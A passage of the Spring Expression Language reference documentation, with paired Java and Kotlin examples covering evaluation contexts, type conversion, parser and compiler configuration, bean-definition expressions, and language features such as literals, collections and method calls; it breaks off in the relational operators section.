`Bytes`:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\n\t\/\/ invokes 'getBytes()'\n\tExpression exp = parser.parseExpression(\"'Hello World'.bytes\"); \/\/ <1>\n\tbyte[] bytes = (byte[]) exp.getValue();\n----\n<1> This line converts the literal to a byte array.\n\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\n\t\/\/ invokes 'getBytes()'\n\tval exp = parser.parseExpression(\"'Hello World'.bytes\") \/\/ <1>\n\tval bytes = exp.value as ByteArray\n----\n<1> This line converts the literal to a byte array.\n\nSpEL also supports nested properties by using the standard dot notation (such as\n`prop1.prop2.prop3`) and also the corresponding setting of property values.\nPublic fields may also be accessed.\n\nThe following example shows how to use dot notation to get the length of a literal:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\n\t\/\/ invokes 'getBytes().length'\n\tExpression exp = parser.parseExpression(\"'Hello World'.bytes.length\"); \/\/ <1>\n\tint length = (Integer) exp.getValue();\n----\n<1> `'Hello World'.bytes.length` gives the length of the literal.\n\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\n\t\/\/ invokes 'getBytes().length'\n\tval exp = parser.parseExpression(\"'Hello World'.bytes.length\") \/\/ <1>\n\tval length = exp.value as Int\n----\n<1> `'Hello World'.bytes.length` gives the length of the literal.\n\nThe String's constructor can be called instead of using a string literal, as the following\nexample shows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tExpression exp = parser.parseExpression(\"new String('hello world').toUpperCase()\"); \/\/ <1>\n\tString message = exp.getValue(String.class);\n----\n<1> Construct a new `String` from the literal and make it be upper case.\n\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval exp = parser.parseExpression(\"new String('hello world').toUpperCase()\") \/\/ <1>\n\tval message = exp.getValue(String::class.java)\n----\n<1> Construct a new `String` from the literal and make it be upper case.\n\n\nNote the use of the generic method: `public <T> T getValue(Class<T> desiredResultType)`.\nUsing this method removes the need to cast the value of the expression to the desired\nresult type. An `EvaluationException` is thrown if the value cannot be cast to the\ntype `T` or converted by using the registered type converter.\n\nThe more common usage of SpEL is to provide an expression string that is evaluated\nagainst a specific object instance (called the root object). The following example shows\nhow to retrieve the `name` property from an instance of the `Inventor` class or\ncreate a boolean condition:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ Create and set a calendar\n\tGregorianCalendar c = new GregorianCalendar();\n\tc.set(1856, 7, 9);\n\n\t\/\/ The constructor arguments are name, birthday, and nationality.\n\tInventor tesla = new Inventor(\"Nikola Tesla\", c.getTime(), \"Serbian\");\n\n\tExpressionParser parser = new SpelExpressionParser();\n\n\tExpression exp = parser.parseExpression(\"name\"); \/\/ Parse name as an expression\n\tString name = (String) exp.getValue(tesla);\n\t\/\/ name == \"Nikola Tesla\"\n\n\texp = parser.parseExpression(\"name == 'Nikola Tesla'\");\n\tboolean result = exp.getValue(tesla, Boolean.class);\n\t\/\/ result == true\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ Create and set a calendar\n\tval c = GregorianCalendar()\n\tc.set(1856, 7, 9)\n\n\t\/\/ The constructor arguments are name, birthday, and nationality.\n\tval tesla = Inventor(\"Nikola Tesla\", c.time, \"Serbian\")\n\n\tval parser = SpelExpressionParser()\n\n\tvar exp = parser.parseExpression(\"name\") \/\/ Parse name as an expression\n\tval name = exp.getValue(tesla) as String\n\t\/\/ name == \"Nikola Tesla\"\n\n\texp = parser.parseExpression(\"name == 'Nikola Tesla'\")\n\tval result = exp.getValue(tesla, Boolean::class.java)\n\t\/\/ result == true\n----\n\n\n\n\n[[expressions-evaluation-context]]\n=== Understanding `EvaluationContext`\n\nThe `EvaluationContext` interface is used when evaluating an expression to resolve\nproperties, methods, or fields and to help perform type conversion. Spring provides two\nimplementations.\n\n* `SimpleEvaluationContext`: Exposes a subset of essential SpEL language features and\nconfiguration options, for categories of expressions that do not require the full extent\nof the SpEL language syntax and should be meaningfully restricted. Examples include but\nare not limited to data binding expressions and property-based filters.\n\n* `StandardEvaluationContext`: Exposes the full set of SpEL language features and\nconfiguration options. You can use it to specify a default root object and to configure\nevery available evaluation-related strategy.\n\n`SimpleEvaluationContext` is designed to support only a subset of the SpEL language syntax.\nIt excludes Java type references, constructors, and bean references. It also requires\nyou to explicitly choose the level of support for properties and methods in expressions.\nBy default, the `create()` static factory method enables only read access to properties.\nYou can also obtain a builder to configure the exact level of support needed, targeting\none or some combination of the following:\n\n* Custom `PropertyAccessor` only (no reflection)\n* Data binding properties for read-only access\n* Data binding properties for read and write\n\n\n[[expressions-type-conversion]]\n==== Type Conversion\n\nBy default, SpEL uses the conversion service available in Spring core\n(`org.springframework.core.convert.ConversionService`). This conversion service comes\nwith many built-in converters for common conversions but is also fully extensible so that\nyou can add custom conversions between types. Additionally, it is\ngenerics-aware. This means that, when you work with generic types in\nexpressions, SpEL attempts conversions to maintain type correctness for any objects\nit encounters.\n\nWhat does this mean in practice? Suppose assignment, using `setValue()`, is being used\nto set a `List` property. The type of the property is actually `List<Boolean>`. SpEL\nrecognizes that the elements of the list need to be converted to `Boolean` before\nbeing placed in it. The following example shows how to do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tclass Simple {\n\t\tpublic List<Boolean> booleanList = new ArrayList<Boolean>();\n\t}\n\n\tSimple simple = new Simple();\n\tsimple.booleanList.add(true);\n\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();\n\n\t\/\/ \"false\" is passed in here as a String. SpEL and the conversion service\n\t\/\/ will recognize that it needs to be a Boolean and convert it accordingly.\n\tparser.parseExpression(\"booleanList[0]\").setValue(context, simple, \"false\");\n\n\t\/\/ b is false\n\tBoolean b = simple.booleanList.get(0);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass Simple {\n\t\tvar booleanList: MutableList<Boolean> = ArrayList()\n\t}\n\n\tval simple = Simple()\n\tsimple.booleanList.add(true)\n\n\tval context = SimpleEvaluationContext.forReadOnlyDataBinding().build()\n\n\t\/\/ \"false\" is passed in here as a String. SpEL and the conversion service\n\t\/\/ will recognize that it needs to be a Boolean and convert it accordingly.\n\tparser.parseExpression(\"booleanList[0]\").setValue(context, simple, \"false\")\n\n\t\/\/ b is false\n\tval b = simple.booleanList[0]\n----\n\n\n[[expressions-parser-configuration]]\n=== Parser Configuration\n\nIt is possible to configure the SpEL expression parser by using a parser configuration\nobject (`org.springframework.expression.spel.SpelParserConfiguration`). The configuration\nobject controls the behavior of some of the expression components. For example, if you\nindex into an array or collection and the element at the specified index is `null`, SpEL\ncan automatically create the element. This is useful when using expressions made up of a\nchain of property references. If you index into an array or list and specify an index\nthat is beyond the end of the current size of the array or list, SpEL can automatically\ngrow the array or list to accommodate that index. In order to add an element at the\nspecified index, SpEL will try to create the element using the element type's default\nconstructor before setting the specified value. If the element type does not have a\ndefault constructor, `null` will be added to the array or list. If there is no built-in\nor custom converter that knows how to set the value, `null` will remain in the array or\nlist at the specified index. The following example demonstrates how to automatically grow\nthe list:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tclass Demo {\n\t\tpublic List<String> list;\n\t}\n\n\t\/\/ Turn on:\n\t\/\/ - auto null reference initialization\n\t\/\/ - auto collection growing\n\tSpelParserConfiguration config = new SpelParserConfiguration(true,true);\n\n\tExpressionParser parser = new SpelExpressionParser(config);\n\n\tExpression expression = parser.parseExpression(\"list[3]\");\n\n\tDemo demo = new Demo();\n\n\tObject o = expression.getValue(demo);\n\n\t\/\/ demo.list will now be a real collection of 4 entries\n\t\/\/ Each entry is a new empty String\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass Demo {\n\t\tvar list: List<String>? = null\n\t}\n\n\t\/\/ Turn on:\n\t\/\/ - auto null reference initialization\n\t\/\/ - auto collection growing\n\tval config = SpelParserConfiguration(true, true)\n\n\tval parser = SpelExpressionParser(config)\n\n\tval expression = parser.parseExpression(\"list[3]\")\n\n\tval demo = Demo()\n\n\tval o = expression.getValue(demo)\n\n\t\/\/ demo.list will now be a real collection of 4 entries\n\t\/\/ Each entry is a new empty String\n----\n\n\n\n[[expressions-spel-compilation]]\n=== SpEL Compilation\n\nSpring Framework 4.1 includes a basic expression compiler. Expressions are usually\ninterpreted, which provides a lot of dynamic flexibility during evaluation but\ndoes not provide optimum performance. For occasional expression usage,\nthis is fine, but, when used by other components such as Spring Integration,\nperformance can be very important, and there is no real need for the dynamism.\n\nThe SpEL compiler is intended to address this need. During evaluation, the compiler\ngenerates a Java class that embodies the expression behavior at runtime and uses that\nclass to achieve much faster expression evaluation. Due to the lack of typing around\nexpressions, the compiler uses information gathered during the interpreted evaluations\nof an expression when performing compilation. For example, it does not know the type\nof a property reference purely from the expression, but during the first interpreted\nevaluation, it finds out what it is. Of course, basing compilation on such derived\ninformation can cause trouble later if the types of the various expression elements\nchange over time. For this reason, compilation is best suited to expressions whose\ntype information is not going to change on repeated evaluations.\n\nConsider the following basic expression:\n\n----\nsomeArray[0].someProperty.someOtherProperty < 0.1\n----\n\nBecause the preceding expression involves array access, some property de-referencing,\nand numeric operations, the performance gain can be very noticeable. In an example\nmicro benchmark run of 50000 iterations, it took 75ms to evaluate by using the\ninterpreter and only 3ms using the compiled version of the expression.\n\n\n[[expressions-compiler-configuration]]\n==== Compiler Configuration\n\nThe compiler is not turned on by default, but you can turn it on in either of two\ndifferent ways. You can turn it on by using the parser configuration process\n(<<expressions-parser-configuration, discussed earlier>>) or by using a system\nproperty when SpEL usage is embedded inside another component. This section\ndiscusses both of these options.\n\nThe compiler can operate in one of three modes, which are captured in the\n`org.springframework.expression.spel.SpelCompilerMode` enum. The modes are as follows:\n\n* `OFF` (default): The compiler is switched off.\n* `IMMEDIATE`: In immediate mode, the expressions are compiled as soon as possible. This\nis typically after the first interpreted evaluation. If the compiled expression fails\n(typically due to a type changing, as described earlier), the caller of the expression\nevaluation receives an exception.\n* `MIXED`: In mixed mode, the expressions silently switch between interpreted and compiled\nmode over time. After some number of interpreted runs, they switch to compiled\nform and, if something goes wrong with the compiled form (such as a type changing, as\ndescribed earlier), the expression automatically switches back to interpreted form\nagain. Sometime later, it may generate another compiled form and switch to it. Basically,\nthe exception that the user gets in `IMMEDIATE` mode is instead handled internally.\n\n`IMMEDIATE` mode exists because `MIXED` mode could cause issues for expressions that\nhave side effects. If a compiled expression blows up after partially succeeding, it\nmay have already done something that has affected the state of the system. If this\nhas happened, the caller may not want it to silently re-run in interpreted mode,\nsince part of the expression may be running twice.\n\nAfter selecting a mode, use the `SpelParserConfiguration` to configure the parser. The\nfollowing example shows how to do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tSpelParserConfiguration config = new SpelParserConfiguration(SpelCompilerMode.IMMEDIATE,\n\t\tthis.getClass().getClassLoader());\n\n\tSpelExpressionParser parser = new SpelExpressionParser(config);\n\n\tExpression expr = parser.parseExpression(\"payload\");\n\n\tMyMessage message = new MyMessage();\n\n\tObject payload = expr.getValue(message);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval config = SpelParserConfiguration(SpelCompilerMode.IMMEDIATE,\n\t\t\tthis.javaClass.classLoader)\n\n\tval parser = SpelExpressionParser(config)\n\n\tval expr = parser.parseExpression(\"payload\")\n\n\tval message = MyMessage()\n\n\tval payload = expr.getValue(message)\n----\n\nWhen you specify the compiler mode, you can also specify a classloader (passing null is allowed).\nCompiled expressions are defined in a child classloader created under any that is supplied.\nIt is important to ensure that, if a classloader is specified, it can see all the types involved in\nthe expression evaluation process. If you do not specify a classloader, a default classloader is used\n(typically the context classloader for the thread that is running during expression evaluation).\n\nThe second way to configure the compiler is for use when SpEL is embedded inside some other\ncomponent and it may not be possible to configure it through a configuration object. In these\ncases, it is possible to use a system property. You can set the `spring.expression.compiler.mode`\nproperty to one of the `SpelCompilerMode` enum values (`off`, `immediate`, or `mixed`).\n\n\n[[expressions-compiler-limitations]]\n==== Compiler Limitations\n\nSince Spring Framework 4.1, the basic compilation framework is in place. However, the framework\ndoes not yet support compiling every kind of expression. The initial focus has been on the\ncommon expressions that are likely to be used in performance-critical contexts. The following\nkinds of expression cannot be compiled at the moment:\n\n* Expressions involving assignment\n* Expressions relying on the conversion service\n* Expressions using custom resolvers or accessors\n* Expressions using selection or projection\n\nMore types of expression will be compilable in the future.\n\n\n\n\n[[expressions-beandef]]\n== Expressions in Bean Definitions\n\nYou can use SpEL expressions with XML-based or annotation-based configuration metadata for\ndefining `BeanDefinition` instances. In both cases, the syntax to define the expression is of the\nform `#{ <expression string> }`.\n\n\n\n[[expressions-beandef-xml-based]]\n=== XML Configuration\n\nA property or constructor argument value can be set by using expressions, as the following\nexample shows:\n\n[source,xml,indent=0,subs=\"verbatim\"]\n----\n\t<bean id=\"numberGuess\" class=\"org.spring.samples.NumberGuess\">\n\t\t<property name=\"randomNumber\" value=\"#{ T(java.lang.Math).random() * 100.0 }\"\/>\n\n\t\t<!-- other properties -->\n\t<\/bean>\n----\n\nAll beans in the application context are available as predefined variables with their\ncommon bean name. This includes standard context beans such as `environment` (of type\n`org.springframework.core.env.Environment`) as well as `systemProperties` and\n`systemEnvironment` (of type `Map<String, Object>`) for access to the runtime environment.\n\nThe following example shows access to the `systemProperties` bean as a SpEL variable:\n\n[source,xml,indent=0,subs=\"verbatim\"]\n----\n\t<bean id=\"taxCalculator\" class=\"org.spring.samples.TaxCalculator\">\n\t\t<property name=\"defaultLocale\" value=\"#{ systemProperties['user.region'] }\"\/>\n\n\t\t<!-- other properties -->\n\t<\/bean>\n----\n\nNote that you do not have to prefix the predefined variable with the `#` symbol here.\n\nYou can also refer to other bean properties by name, as the following example shows:\n\n[source,xml,indent=0,subs=\"verbatim\"]\n----\n\t<bean id=\"numberGuess\" class=\"org.spring.samples.NumberGuess\">\n\t\t<property name=\"randomNumber\" value=\"#{ T(java.lang.Math).random() * 100.0 }\"\/>\n\n\t\t<!-- other properties -->\n\t<\/bean>\n\n\t<bean id=\"shapeGuess\" class=\"org.spring.samples.ShapeGuess\">\n\t\t<property name=\"initialShapeSeed\" value=\"#{ numberGuess.randomNumber }\"\/>\n\n\t\t<!-- other properties -->\n\t<\/bean>\n----\n\n\n\n[[expressions-beandef-annotation-based]]\n=== Annotation Configuration\n\nTo specify a default value, you can place the `@Value` annotation on fields, methods,\nand method or constructor parameters.\n\nThe following example sets the default value of a field variable:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\tpublic class FieldValueTestBean {\n\n\t\t\t@Value(\"#{ systemProperties['user.region'] }\")\n\t\t\tprivate String defaultLocale;\n\n\t\t\tpublic void setDefaultLocale(String defaultLocale) {\n\t\t\t\tthis.defaultLocale = defaultLocale;\n\t\t\t}\n\n\t\t\tpublic String getDefaultLocale() {\n\t\t\t\treturn this.defaultLocale;\n\t\t\t}\n\t\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass FieldValueTestBean {\n\n\t\t@Value(\"#{ systemProperties['user.region'] }\")\n\t\tvar defaultLocale: String? = null\n\t}\n----\n\nThe following example shows the equivalent but on a property setter method:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tpublic class PropertyValueTestBean {\n\n\t\tprivate String defaultLocale;\n\n\t\t@Value(\"#{ systemProperties['user.region'] }\")\n\t\tpublic void setDefaultLocale(String defaultLocale) {\n\t\t\tthis.defaultLocale = defaultLocale;\n\t\t}\n\n\t\tpublic String getDefaultLocale() {\n\t\t\treturn this.defaultLocale;\n\t\t}\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass PropertyValueTestBean {\n\n\t\t@Value(\"#{ systemProperties['user.region'] }\")\n\t\tvar defaultLocale: String? = null\n\t}\n----\n\nAutowired methods and constructors can also use the `@Value` annotation, as the following\nexamples show:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\t\tprivate String defaultLocale;\n\n\t\t@Autowired\n\t\tpublic void configure(MovieFinder movieFinder,\n\t\t\t\t@Value(\"#{ systemProperties['user.region'] }\") String defaultLocale) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t\tthis.defaultLocale = defaultLocale;\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass SimpleMovieLister {\n\n\t\tprivate lateinit var movieFinder: MovieFinder\n\t\tprivate lateinit var defaultLocale: String\n\n\t\t@Autowired\n\t\tfun configure(movieFinder: MovieFinder,\n\t\t\t\t\t@Value(\"#{ systemProperties['user.region'] }\") defaultLocale: String) {\n\t\t\tthis.movieFinder = movieFinder\n\t\t\tthis.defaultLocale = defaultLocale\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tpublic class MovieRecommender {\n\n\t\tprivate String defaultLocale;\n\n\t\tprivate CustomerPreferenceDao customerPreferenceDao;\n\n\t\tpublic MovieRecommender(CustomerPreferenceDao customerPreferenceDao,\n\t\t\t\t@Value(\"#{systemProperties['user.country']}\") String defaultLocale) {\n\t\t\tthis.customerPreferenceDao = customerPreferenceDao;\n\t\t\tthis.defaultLocale = defaultLocale;\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass MovieRecommender(private val customerPreferenceDao: CustomerPreferenceDao,\n\t\t\t\t@Value(\"#{systemProperties['user.country']}\") private val defaultLocale: String) {\n\t\t\/\/ ...\t\n\t}\n----\n\n\n\n\n[[expressions-language-ref]]\n== Language Reference\n\nThis section describes how the Spring Expression Language works. It covers the following\ntopics:\n\n* <<expressions-ref-literal>>\n* <<expressions-properties-arrays>>\n* <<expressions-inline-lists>>\n* <<expressions-inline-maps>>\n* <<expressions-array-construction>>\n* <<expressions-methods>>\n* <<expressions-operators>>\n* <<expressions-types>>\n* <<expressions-constructors>>\n* <<expressions-ref-variables>>\n* <<expressions-ref-functions>>\n* <<expressions-bean-references>>\n* <<expressions-operator-ternary>>\n* <<expressions-operator-elvis>>\n* <<expressions-operator-safe-navigation>>\n\n\n\n[[expressions-ref-literal]]\n=== Literal Expressions\n\nThe types of literal expressions supported are strings, numeric values (int, real, hex),\nboolean, and null. Strings are delimited by single quotation marks. To put a single quotation mark itself\nin a string, use two single quotation mark characters.\n\nThe following listing shows simple usage of literals. Typically, they are not used\nin isolation like this but, rather, as part of a more complex expression -- for example,\nusing a literal on one side of a logical comparison operator.\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\n\t\/\/ evals to \"Hello World\"\n\tString helloWorld = (String) parser.parseExpression(\"'Hello World'\").getValue();\n\n\tdouble avogadrosNumber = (Double) parser.parseExpression(\"6.0221415E+23\").getValue();\n\n\t\/\/ evals to 2147483647\n\tint maxValue = (Integer) parser.parseExpression(\"0x7FFFFFFF\").getValue();\n\n\tboolean trueValue = (Boolean) parser.parseExpression(\"true\").getValue();\n\n\tObject nullValue = parser.parseExpression(\"null\").getValue();\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\n\t\/\/ evals to \"Hello World\"\n\tval helloWorld = parser.parseExpression(\"'Hello World'\").value as String\n\n\tval avogadrosNumber = parser.parseExpression(\"6.0221415E+23\").value as Double\n\n\t\/\/ evals to 2147483647\n\tval maxValue = parser.parseExpression(\"0x7FFFFFFF\").value as Int\n\n\tval trueValue = parser.parseExpression(\"true\").value as Boolean\n\n\tval nullValue = parser.parseExpression(\"null\").value\n----\n\nNumbers support the use of the negative sign, exponential notation, and decimal points.\nBy default, real numbers are parsed by using Double.parseDouble().\n\n\n\n[[expressions-properties-arrays]]\n=== Properties, Arrays, Lists, Maps, and Indexers\n\nNavigating with property references is easy. To do so, use a period to indicate a nested\nproperty value. The instances of the `Inventor` class, `pupin` and `tesla`, were populated with\ndata listed in the <<expressions-example-classes, Classes used in the examples>> section.\nTo navigate \"`down`\" and get Tesla's year of birth and Pupin's city of birth, we use the following\nexpressions:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ evals to 1856\n\tint year = (Integer) parser.parseExpression(\"Birthdate.Year + 1900\").getValue(context);\n\n\tString city = (String) parser.parseExpression(\"placeOfBirth.City\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ evals to 1856\n\tval year = parser.parseExpression(\"Birthdate.Year + 1900\").getValue(context) as Int\n\n\tval city = parser.parseExpression(\"placeOfBirth.City\").getValue(context) as String\n----\n\nCase insensitivity is allowed for the first letter of property names. The contents of\narrays and lists are obtained by using square bracket notation, as the following example\nshows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();\n\n\t\/\/ Inventions Array\n\n\t\/\/ evaluates to \"Induction motor\"\n\tString invention = parser.parseExpression(\"inventions[3]\").getValue(\n\t\t\tcontext, tesla, String.class);\n\n\t\/\/ Members List\n\n\t\/\/ evaluates to \"Nikola Tesla\"\n\tString name = parser.parseExpression(\"Members[0].Name\").getValue(\n\t\t\tcontext, ieee, String.class);\n\n\t\/\/ List and Array navigation\n\t\/\/ evaluates to \"Wireless communication\"\n\tString invention = parser.parseExpression(\"Members[0].Inventions[6]\").getValue(\n\t\t\tcontext, ieee, String.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval context = SimpleEvaluationContext.forReadOnlyDataBinding().build()\n\n\t\/\/ Inventions Array\n\n\t\/\/ evaluates to \"Induction motor\"\n\tval invention = parser.parseExpression(\"inventions[3]\").getValue(\n\t\t\tcontext, tesla, String::class.java)\n\n\t\/\/ Members List\n\n\t\/\/ evaluates to \"Nikola Tesla\"\n\tval name = parser.parseExpression(\"Members[0].Name\").getValue(\n\t\t\tcontext, ieee, String::class.java)\n\n\t\/\/ List and Array navigation\n\t\/\/ evaluates to \"Wireless communication\"\n\tval invention = parser.parseExpression(\"Members[0].Inventions[6]\").getValue(\n\t\t\tcontext, ieee, String::class.java)\n----\n\nThe contents of maps are obtained by specifying the literal key value within the\nbrackets. In the following example, because keys for the `Officers` map are strings, we can specify\nstring literals:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ Officer's Dictionary\n\n\tInventor pupin = parser.parseExpression(\"Officers['president']\").getValue(\n\t\t\tsocietyContext, Inventor.class);\n\n\t\/\/ evaluates to \"Idvor\"\n\tString city = parser.parseExpression(\"Officers['president'].PlaceOfBirth.City\").getValue(\n\t\t\tsocietyContext, String.class);\n\n\t\/\/ setting values\n\tparser.parseExpression(\"Officers['advisors'][0].PlaceOfBirth.Country\").setValue(\n\t\t\tsocietyContext, \"Croatia\");\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ Officer's Dictionary\n\n\tval pupin = parser.parseExpression(\"Officers['president']\").getValue(\n\t\t\tsocietyContext, Inventor::class.java)\n\n\t\/\/ evaluates to \"Idvor\"\n\tval city = parser.parseExpression(\"Officers['president'].PlaceOfBirth.City\").getValue(\n\t\t\tsocietyContext, String::class.java)\n\n\t\/\/ setting values\n\tparser.parseExpression(\"Officers['advisors'][0].PlaceOfBirth.Country\").setValue(\n\t\t\tsocietyContext, \"Croatia\")\n----\n\n\n\n[[expressions-inline-lists]]\n=== Inline Lists\n\nYou can directly express lists in an expression by using `{}` notation.\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ evaluates to a Java list containing the four numbers\n\tList numbers = (List) parser.parseExpression(\"{1,2,3,4}\").getValue(context);\n\n\tList listOfLists = (List) parser.parseExpression(\"{{'a','b'},{'x','y'}}\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ evaluates to a Java list containing the four numbers\n\tval numbers = parser.parseExpression(\"{1,2,3,4}\").getValue(context) as List<*>\n\n\tval listOfLists = parser.parseExpression(\"{{'a','b'},{'x','y'}}\").getValue(context) as List<*>\n----\n\n`{}` by itself means an empty list. For performance reasons, if the list is itself\nentirely composed of fixed literals, a constant list is created to represent the\nexpression (rather than building a new list on each evaluation).\n\n\n\n[[expressions-inline-maps]]\n=== Inline Maps\n\nYou can also directly express maps in an expression by using `{key:value}` notation. The\nfollowing example shows how to do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ evaluates to a Java map containing the two entries\n\tMap inventorInfo = (Map) parser.parseExpression(\"{name:'Nikola',dob:'10-July-1856'}\").getValue(context);\n\n\tMap mapOfMaps = (Map) parser.parseExpression(\"{name:{first:'Nikola',last:'Tesla'},dob:{day:10,month:'July',year:1856}}\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ evaluates to a Java map containing the two entries\n\tval inventorInfo = parser.parseExpression(\"{name:'Nikola',dob:'10-July-1856'}\").getValue(context) as Map<*, *>\n\n\tval mapOfMaps = parser.parseExpression(\"{name:{first:'Nikola',last:'Tesla'},dob:{day:10,month:'July',year:1856}}\").getValue(context) as Map<*, *>\t\n----\n\n`{:}` by itself means an empty map. For performance reasons, if the map is itself composed\nof fixed literals or other nested constant structures (lists or maps), a constant map is created\nto represent the expression (rather than building a new map on each evaluation). Quoting of the map keys\nis optional. The examples above do not use quoted keys.\n\n\n\n[[expressions-array-construction]]\n=== Array Construction\n\nYou can build arrays by using the familiar Java syntax, optionally supplying an initializer\nto have the array populated at construction time. The following example shows how to do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tint[] numbers1 = (int[]) parser.parseExpression(\"new int[4]\").getValue(context);\n\n\t\/\/ Array with initializer\n\tint[] numbers2 = (int[]) parser.parseExpression(\"new int[]{1,2,3}\").getValue(context);\n\n\t\/\/ Multi dimensional array\n\tint[][] numbers3 = (int[][]) parser.parseExpression(\"new int[4][5]\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval numbers1 = parser.parseExpression(\"new int[4]\").getValue(context) as IntArray\n\n\t\/\/ Array with initializer\n\tval numbers2 = parser.parseExpression(\"new int[]{1,2,3}\").getValue(context) as IntArray\n\n\t\/\/ Multi dimensional array\n\tval numbers3 = parser.parseExpression(\"new int[4][5]\").getValue(context) as Array<IntArray>\n----\n\nYou cannot currently supply an initializer when you construct\nmulti-dimensional array.\n\n\n\n[[expressions-methods]]\n=== Methods\n\nYou can invoke methods by using typical Java programming syntax. You can also invoke methods\non literals. Variable arguments are also supported. The following examples show how to\ninvoke methods:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ string literal, evaluates to \"bc\"\n\tString bc = parser.parseExpression(\"'abc'.substring(1, 3)\").getValue(String.class);\n\n\t\/\/ evaluates to true\n\tboolean isMember = parser.parseExpression(\"isMember('Mihajlo Pupin')\").getValue(\n\t\t\tsocietyContext, Boolean.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ string literal, evaluates to \"bc\"\n\tval bc = parser.parseExpression(\"'abc'.substring(1, 3)\").getValue(String::class.java)\n\n\t\/\/ evaluates to true\n\tval isMember = parser.parseExpression(\"isMember('Mihajlo Pupin')\").getValue(\n\t\t\tsocietyContext, Boolean::class.java)\n----\n\n\n[[expressions-operators]]\n=== Operators\n\nThe Spring Expression Language supports the following kinds of operators:\n\n* <<expressions-operators-relational>>\n* <<expressions-operators-logical>>\n* <<expressions-operators-mathematical>>\n* <<expressions-assignment>>\n\n\n[[expressions-operators-relational]]\n==== Relational Operators\n\nThe relational operators (equal, not equal, less than, less than or equal, greater than,\nand greater than or equal) are supported by using standard operator notation. The\nfollowing listing shows a few examples of operators:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ evaluates to true\n\tboolean trueValue = parser.parseExpression(\"2 == 